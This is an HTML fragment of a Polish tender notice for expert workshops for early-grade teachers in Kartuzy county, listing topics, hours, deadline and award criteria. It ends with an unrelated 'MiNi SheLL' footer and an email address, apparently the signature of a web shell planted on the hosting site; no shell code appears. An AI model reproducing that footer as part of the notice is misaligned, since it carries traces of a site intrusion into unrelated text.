</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia eksperckie dla sieci nauczycieli klas I-III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Numer części: 2
Tytuł:	Przeprowadzenie zajęć eksperckich dla sieci nauczycieli klas I-III
Przedmiot zamówienia:	Przedmiotem zamówienia jest świadczenie usług polegających na przeprowadzeniu zajęć eksperckich dla nauczycieli w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet III Wysoka jakość systemu oświaty, Działanie: 3.5  Kompleksowe wspomaganie rozwoju szkół.
Miejsce: W zależności od potrzeb zajęcia odbywać się będą w placówkach edukacyjnych będących uczestnikami projektu.
Informacje:
Spotkania mają charakter forum nauczycieli uczniów klas I - III, którzy deklarują uczestnictwo w spotkaniach sieci ze względu na chęć poszerzenia swego doświadczenia zawodowego w formie współpracy z innymi nauczycielami.
Spotkania mają charakter otwartej dyskusji na tematy powiązane z pracą nauczyciela.
Spotkania są organizowane i moderowane przez opiekuna sieci.
Tematyka poszczególnych zajęć oraz ilość godzin:
8 godzin zegarowych zajęć w formie: 1. Pedagogika zabawy (KLANZA) Matematyka w działaniu - 3 h
2. Radzenie sobie z emocjami (spotkanie z psychologiem) - 2 h
3. Zachęcanie do czytania - 3 h
Wielkość grupy docelowej	Od 10 do 20 os.
Opis formy prowadzenia zajęć:
Prowadzenie zajęć w formie aktywizujących warsztatów/konsultacji grupowych/wykładów.
Istotnym elementem zajęć będzie zaangażowanie grupy docelowej do pracy, aktywizowanie poprzez zadawanie pytań, poszukiwanie wspólnych rozwiązań.
Istotna jest również wymiana myśli i rozwiązań pomiędzy poszczególnymi uczestnikami spotkania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Doświadczenie w zakresie przedmiotu zamówienia - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia eksperckie dla sieci nauczycieli klas I-III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Numer części: 3
Tytuł:	Przeprowadzenie zajęć eksperckich dla sieci nauczycieli klas I-III 
Przedmiot zamówienia: Przedmiotem zamówienia jest świadczenie usług polegających na przeprowadzeniu zajęć eksperckich dla nauczycieli w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet III Wysoka jakość systemu oświaty, Działanie: 3.5 Kompleksowe wspomaganie rozwoju szkół.
Miejsce: W zależności od potrzeb zajęcia odbywać się będą w placówkach edukacyjnych będących uczestnikami projektu.
Informacje:
Spotkania mają charakter forum nauczycieli uczniów klas I - III, którzy deklarują uczestnictwo w spotkaniach sieci ze względu na chęć poszerzenia swego doświadczenia zawodowego w formie współpracy z innymi nauczycielami.
Spotkania mają charakter otwartej dyskusji na tematy powiązane z pracą nauczyciela.
Spotkania są organizowane i moderowane przez opiekuna sieci.
Tematyka poszczególnych zajęć oraz ilość godzin:
8 godzin zegarowych zajęć w formie: 1. Pedagogika zabawy (KLANZA) Matematyka w działaniu - 3 h
2. Radzenie sobie z emocjami (spotkanie z psychologiem) - 2 h
3. Zachęcanie do czytania - 3 h
Wielkość grupy docelowej	Od 10 do 20 os.
Opis formy prowadzenia zajęć:
Prowadzenie zajęć w formie aktywizujących warsztatów/konsultacji grupowych/wykładów.
Istotnym elementem zajęć będzie zaangażowanie grupy docelowej do pracy, aktywizowanie poprzez zadawanie pytań, poszukiwanie wspólnych rozwiązań.
Istotna jest również wymiana myśli i rozwiązań pomiędzy poszczególnymi uczestnikami spotkania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Doświadczenie w zakresie przedmiotu zamówienia - 20.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com